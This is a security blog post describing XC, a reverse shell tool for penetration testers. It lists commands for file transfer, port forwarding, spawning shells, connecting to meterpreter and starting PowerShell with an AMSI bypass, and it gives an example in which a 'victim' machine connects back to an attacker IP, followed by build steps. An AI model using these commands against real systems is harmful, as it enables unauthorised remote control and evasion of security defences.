Cyber security

XC : A Comprehensive Guide To Netcat – Like Reverse Shell For Linux And Windows

A powerful tool reminiscent of Netcat, designed for both Linux and Windows systems.

With its array of features including file manipulation, port forwarding, and plugin execution, XC offers versatile capabilities for penetration testers and ethical hackers.

This article provides a detailed overview and setup guide for leveraging XC’s functionalities effectively.

Netcat like reverse shell for Linux & Windows.

Features

Windows

Usage:
└ Shared Commands:  !exit
  !upload <src> <dst>
   * uploads a file to the target
  !download <src> <dst>
   * downloads a file from the target
  !lfwd <localport> <remoteaddr> <remoteport>
   * local portforwarding (like ssh -L)
  !rfwd <remoteport> <localaddr> <localport>
   * remote portforwarding (like ssh -R)
  !lsfwd
   * lists active forwards
  !rmfwd <index>
   * removes forward by index
  !plugins
   * lists available plugins
  !plugin <plugin>
   * execute a plugin
  !spawn <port>
   * spawns another client on the specified port
  !shell
   * runs /bin/sh
  !runas <username> <password> <domain>
   * restart xc with the specified user
  !met <port>
   * connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
  !powershell
    * starts powershell with AMSI Bypass
  !rc <port>
    * connects to a local bind shell and restarts this client over it
  !runasps <username> <password> <domain>
    * restart xc with the specified user using powershell
  !vulns
    * checks for common vulnerabilities

Linux

Usage:
└ Shared Commands:  !exit
  !upload <src> <dst>
   * uploads a file to the target
  !download <src> <dst>
   * downloads a file from the target
  !lfwd <localport> <remoteaddr> <remoteport>
   * local portforwarding (like ssh -L)
  !rfwd <remoteport> <localaddr> <localport>
   * remote portforwarding (like ssh -R)
  !lsfwd
   * lists active forwards
  !rmfwd <index>
   * removes forward by index
  !plugins
   * lists available plugins
  !plugin <plugin>
   * execute a plugin
  !spawn <port>
   * spawns another client on the specified port
  !shell
   * runs /bin/sh
  !runas <username> <password> <domain>
   * restart xc with the specified user
  !met <port>
   * connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
 !ssh <port>
   * starts sshd with the configured keys on the specified port

Examples

  • Linux Attacker: rlwrap xc -l -p 1337 (Server)
  • WindowsVictim : xc.exe 10.10.14.4 1337 (Client)
  • Argumentless: xc_10.10.14.4_1337.exe (Client)

Setup

Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu: go version go1.16.2 linux/amd64 and kali go version go1.15.9 linux/amd64

git clone --recurse-submodules https://github.com/xct/xc.git

GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
GO111MODULE=off go get github.com/libp2p/go-reuseport
sudo apt-get install rlwrap upx

Linux:

python3 build.py
Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

Cybersecurity – Tools And Their Function

Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…

15 hours ago

MODeflattener – Miasm’s OLLVM Deflattener

MODeflattener is a specialized tool designed to reverse OLLVM's control flow flattening obfuscation through static…

15 hours ago

My Awesome List : Tools And Their Functions

"My Awesome List" is a curated collection of tools, libraries, and resources spanning various domains…

15 hours ago

Chrome Browser Exploitation, Part 3 : Analyzing And Exploiting CVE-2018-17463

CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, allowed attackers to execute arbitrary…

15 hours ago

Chrome Browser Exploitation, Part 1 : Introduction To V8 And JavaScript Internals

The blog post "Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals" provides…

16 hours ago

Chrome Browser Exploitation, Part 3: Analyzing and Exploiting CVE-2018-17463

The exploitation of CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, relies on…

19 hours ago